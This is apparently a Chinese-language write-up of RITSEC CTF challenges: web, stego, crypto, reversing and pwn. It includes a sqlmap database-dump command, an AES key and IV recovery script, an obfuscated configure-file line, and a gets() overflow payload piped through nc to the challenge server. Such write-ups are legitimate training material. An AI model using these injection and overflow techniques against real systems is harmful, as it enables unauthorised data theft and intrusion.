- A+
Space Force
The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. Check it out at fun.ritsec.club:8005!
打开网站,好像可以提供搜索功能
抓个包,试试注入
POST /index.php HTTP/1.1
Host: fun.ritsec.club:8005
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fun.ritsec.club:8005/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Connection: keep-alive
Upgrade-Insecure-Requests: 1
name=The+Javelin
sqlmap -r burp.txt -D challenge -T spaceships --dump
flag:RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}
Burn the candle on both ends
常规套路.藏了个zip,分解就可以了
可是还有密码,经过很久很久的爆破,密码为stegosaurus
flag:RITSEC{8U51N355-1N-7H3-Fr0N7-P4r7Y-1N-7H3-84CK}
I am a Stegosaurus
下载图片下来,linux打不开,可能是修改了图片的高或者宽,放到windows直接可以打开,flag就在图片下方
flag:RITSEC{th1nk_0uts1d3_th3_b0x}
Nobody uses the eggplant emoji
这是个脑洞大开的题目,密文全是表情包
题目:
发现这些表情包中还夹杂这一些下划线,可以尝试将这些表情包转化为不同的字符来
得到ABCDEFCGHAIJCDEFCKLMCNELGHDCEBCGHMCBOKPCBALQGCDEFCRFQGCKIQNMLCGHMQMCGHLMMCSFMQGAEIQTCNHKGCAQCDEFCIKRMUCNHKGCAQCDEFLCSFMQGUCNHKGCAQCGHMCKALCQVMMWCXMOEYAGDCEBCKICFIOKWMICQNKOOENTCDEFLCBOKPCAQZCKBLAYKI[EL[MFLEVMKI[QNKOOEN[NEN[GHMLMQ[K[WABBMLMIYMC
再通过词频分析得到IFSYOUSTHINGSYOUSARESWORTHYSOFSTHESFLAMSFIRDTSYOUSJUDTSANDWERSTHEDESTHREESQUEDTIONDPSWHATSIDSYOUSNAJEVSWHATSIDSYOURSQUEDTVSWHATSIDSTHESAIRSDBEEKSZELOCITYSOFSANSUNLAKENSDWALLOWPSYOURSFLAMSIDXSAFRICAN[OR[EUROBEAN[DWALLOW[WOW[THERED[A[KIFFERENCES
经过替换字符
flag:RITSEC{african_or_european_swallow_wow_theres_a_difference}
Who drew on my program?
下载图片
百度了一下,发现好像是原题,https://github.com/dqi/ctf_writeup/tree/master/2015/tmctf/crypto200
跟这个题很像
也是划掉一些关键的信息,求出flag,看看他的payload
#!/usr/bin/python
from Crypto.Cipher import AES
import binascii
import string
import itertools
# given
bKEY = "5d6I9pfR7C1JQt"
# use null bytes to minimize effect on output
IV = "\x00"*16
def encrypt(message, passphrase):
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.encrypt(message)
def decrypt(cipher, passphrase):
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.decrypt(cipher)
pt = "The message is protected by AES!"
ct = "fe000000000000000000000000009ec3307df037c689300bbf2812ff89bc0b49"
# find the key using the plaintext and ciphertext we know, since the IV has no effect on the decryption of the second block
for i in itertools.product(string.printable, repeat=2):
eKEY = ''.join(i)
KEY = bKEY + eKEY
ptc = decrypt(binascii.unhexlify(ct), KEY)
if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]:
print "Got KEY: " + str(KEY)
fKEY = KEY
pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:]
print "Decrypting with CT mostly zeroes gives: " + pt2
print "Should be: " + binascii.hexlify(pt[16:])
# we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i], since we chose ct 00 in all the positions we are going to recover
answer = ""
for i in range(13):
pi = pt[17+i] # letters from the plaintext
pti = pt2[2*i+2:2*i+4] # 2 hex letters from decryption of second block
answer += "%02X" % (ord(pi) ^ int(pti, 16))
rct = ct[0:2] + answer.lower() + ct[28:]
print "Which means CT was: " + rct
# now we can decrypt the recovered ct and xor against the pt to recover the IV
wpt = decrypt(binascii.unhexlify(rct), fKEY)
IV = ""
for i in range(16):
p = ord(pt[i]) ^ ord(wpt[i])
IV += "%02X" % p
IV = binascii.unhexlify(IV)
# sanity check:
aes = AES.new(fKEY, AES.MODE_CBC, IV)
print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct))
# We won!
print "The IV is: " + IV
将bKEY改成我们题目上面的
#!/usr/bin/python
from Crypto.Cipher import AES
import binascii
import string
import itertools
# given
bKEY = "9aF738g9AkI112"
# use null bytes to minimize effect on output
IV = "\x00"*16
def encrypt(message, passphrase):
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.encrypt(message)
def decrypt(cipher, passphrase):
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.decrypt(cipher)
pt = "The message is protected by AES!"
ct = "9e00000000000000000000000000436a808e200a54806b0e94fb9633db9d67f0"
# find the key using the plaintext and ciphertext we know, since the IV has no effect on the decryption of the second block
for i in itertools.product(string.printable, repeat=2):
eKEY = ''.join(i)
KEY = bKEY + eKEY
ptc = decrypt(binascii.unhexlify(ct), KEY)
if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]:
print "Got KEY: " + str(KEY)
fKEY = KEY
pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:]
print "Decrypting with CT mostly zeroes gives: " + pt2
print "Should be: " + binascii.hexlify(pt[16:])
# we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i], since we chose ct 00 in all the positions we are going to recover
answer = ""
for i in range(13):
pi = pt[17+i] # letters from the plaintext
pti = pt2[2*i+2:2*i+4] # 2 hex letters from decryption of second block
answer += "%02X" % (ord(pi) ^ int(pti, 16))
rct = ct[0:2] + answer.lower() + ct[28:]
print "Which means CT was: " + rct
# now we can decrypt the recovered ct and xor against the pt to recover the IV
wpt = decrypt(binascii.unhexlify(rct), fKEY)
IV = ""
for i in range(16):
p = ord(pt[i]) ^ ord(wpt[i])
IV += "%02X" % p
IV = binascii.unhexlify(IV)
# sanity check:
aes = AES.new(fKEY, AES.MODE_CBC, IV)
print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct))
# We won!
print "The IV is: " + IV
flag:RITSEC{b4dcbc#g}
Talk to me
加入频道:https://discord.gg/p7tHuSq
搜索RITSEC
flag:RITSEC{its_like_irc-but_with_2_much_javascript}
Patch Patch
查看下patch-patch-patch文件
diff -ur patch-2.7.1/src/patch.c patch-2.7.1.1/src/patch.c
--- patch-2.7.1/src/patch.c 2018-11-02 01:12:30.625613158 -0400
+++ patch-2.7.1.1/src/patch.c 2018-11-02 01:13:21.498608985 -0400
@@ -1953,9 +1953,9 @@
fatal_exit (int sig)
{
cleanup ();
-#ifdef backdoor
- printf("Looks like we got a vulnerability here");
-#endif
+
+/* Removed a super bad vuln here */
+
if (sig)
exit_with_signal (sig);
并没有什么有用的东西,在看看patch-2.7.1-10.el7.centos.src,把它全部解压,发现其中的patch-2.7.1中的configure有个奇怪的东西
TEST=$(echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`)
是个bash脚本,我们尝试运行下
echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`
RITSEC{VULNS_4R3_BAD_}
flag:RITSEC{VULNS_4R3_BAD_}
What_Th._Fgck
题目就给了这个
OGK:DI_G;lqk"Kj1;"a"yao";fr3dog0o"vdtnsaoh"patsfk{+
这是个dvorak密码,下面是关于dvorak的键盘分布图
直接使用工具
得到明文RITSEC{Isn't”Th1s”a”far”sup3eri0r”keyboard”layout?}
将其双引号改成下划线就可以了
flag:RITSEC{Isn't_Th1s_a_far_sup3eri0r_keyboard_layout?}
RIP
这个给了一张图和一段密文
+[----->+++<]>+.++++++++++++..----.+++.+[-->+<]>.-----------..++[--->++<]>+...---[++>---<]>.--[----->++<]>+.----------.++++++.-.+.+[->+++<]>.+++.[->+++<]>-.--[--->+<]>-.++++++++++++.--.+++[->+++++<]>-.++[--->++<]>+.-[->+++<]>-.--[--->+<]>-.++[->+++<]>+.+++++.++[->+++<]>+.----[->++<]>.[-->+<]>++.+++++++++.--[------>+<]>.--[-->+++<]>--.+++++++++++++.----------.>--[----->+<]>.-.>-[--->+<]>--.++++.---------.-.
解密之后是个链接https://www.youtube.com/watch?v=F6LYOfeSWNM
没什么用,再看看图片,这个图片的奇怪之处在于他的周围是些彩色的小方块,c查了下才知道这些是一种编程语言PIET,我们把图片中的其他部分去掉
在线解密
flag:RITSEC{WH4AT_TH3_P13T_1337}
Check out this cool filter
这个毫无头绪,看了大佬的wp才知道
from PIL import Image
img = Image.open('CheckOutThisFilter.png').convert('RGB')
w, h = img.size
codes = []
for y in range(0, h):
for x in range(0, w):
r, g, b = img.getpixel((x, y))
codes.append(b)#得到图片的blue值的排列
codes = codes[:51]
flag = ''
for code in codes:
flag += chr(code - 13)
print flag
flag:RITSEC{TIL_JPEG_COMPRESSION_MESSES_WITH_RGB_VALUES}
music.png
这个题也是大开眼界,这是一种新的音乐类型,被命名为“bytebeat”。
使用脚本从图片中提取出代码
from PIL import Image
img = Image.open('music.png').convert('RGB')
w, h = img.size
r_str = ''
g_str = ''
b_str = ''
for y in range(0, h):
for x in range(0, w):
r, g, b = img.getpixel((x, y))
r_str += chr(r)
g_str += chr(g)
b_str += chr(b)
s = r_str[:32] + g_str[:38] + b_str[:66]
print s
得到(t<<3)*[8/9,1,9/8,6/5,4/3,3/2,0][[0xd2d2c7,0xce4087,0xca32c7,0x8e4008][t>>14&3.1]>>(0x3dbe4687>>((t>>10&15)>9?18:t>>10&15)*3&7.1)*3&7.1]
通过在线工具运行
播放了一段音乐,听歌识曲为「Never Gonna Give You Up」
所以flag为:RITSEC{never_gonna_give_you_up}
关于bytebeat的介绍点我
ezpwn
拖到ida中查看
大概代码如下
int main(){
int x = 0;
char buffer;
FILE *f;
puts("Please enter your API key");
gets(&buffer);
f = fopen("flag.txt","r");
if(x==1){
while(y != -1){
y=fgetc(f); // Acts like the decrement
putchar(y);
fclose(f);
}
}
printf("%d\n",x);
}
定义了一个x为0,可是只有当x=1的时候才可以读取flag,其中关键的函数还是gets,可以来修改x的值,首先我们确定偏移量
└──╼ $./ezpwn
Please enter your API key
aaaabaaacaaadaaaeaaafaaagaaaha
1633771879
使用cyclic得到偏移量为24,在本地写个flag.txt,构造python -c 'print "A"*24 +"\x01" ' | ./ezpwn
└──╼ $python -c 'print "A"*24 +"\x01" ' | ./ezpwn
Please enter your API key
flag{666666}
1
本地成功
root@kali:~/pwn# python -c "print 'a'*24 + '\x01\x00\x00\x00'"| nc fun.ritsec.club 8001
Please enter your API key
RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}1
得到flag
flag:RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}